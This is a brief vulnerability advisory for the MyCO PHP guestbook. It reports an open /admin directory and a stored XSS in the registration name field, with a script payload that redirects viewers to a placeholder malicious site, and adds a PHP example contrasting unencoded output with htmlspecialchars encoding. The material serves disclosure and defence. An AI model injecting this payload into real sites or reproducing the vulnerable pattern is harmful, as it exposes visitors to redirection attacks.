MyCO multiple vulnerabilities

Software: MyCO guestbook 1.0
www.punctweb.com

Credit: Revnic Vasile revnic@xxxxxxxxx

Description: MyCO is a PHP guestbook that uses a MySQL database.

Vulnerability:

The /admin directory is accessible by everyone.

XSS can be injected into the "Name" field when registering a new user:

<script>document.location = 'http://some.site/crash_ie.asp';</script>

When the members list is viewed, this can redirect the user's browser to a malicious site.
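
The stored XSS described above comes from writing the saved "Name" value into the members list without output encoding. The following is an added example, not MyCO source code and not part of the original advisory; the function names and the $members array are hypothetical, and it shows the vulnerable rendering pattern beside the encoded one.

```php
<?php
declare(strict_types=1);
// Added example; hypothetical names, not MyCO source code.

// Constructed sample rows, standing in for a SELECT over the members table.
// The second row is the value from the advisory, stored verbatim at registration.
$members = [
    ['name' => 'Alice'],
    ['name' => "<script>document.location = 'http://some.site/crash_ie.asp';</script>"],
];

// Vulnerable pattern: the stored value is concatenated into HTML as-is,
// so the browser parses it as markup when the members list is viewed.
function render_row_vulnerable(array $member): string
{
    return '<li>' . $member['name'] . '</li>';
}

// Encode at output time for the HTML context.
// ENT_QUOTES encodes both quote styles, so the helper is also safe inside
// quoted attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 sequences
// instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: the same row, with the name encoded before it is emitted.
function render_row(array $member): string
{
    return '<li>' . h($member['name']) . '</li>';
}

// Print both renderings so the difference is visible in the page source.
foreach ($members as $m) {
    echo 'vulnerable: ', render_row_vulnerable($m), PHP_EOL;
    echo 'hardened:   ', render_row($m), PHP_EOL;
}
```

In the hardened output the second row is emitted as `&lt;script&gt;...` text, which the browser displays rather than executes.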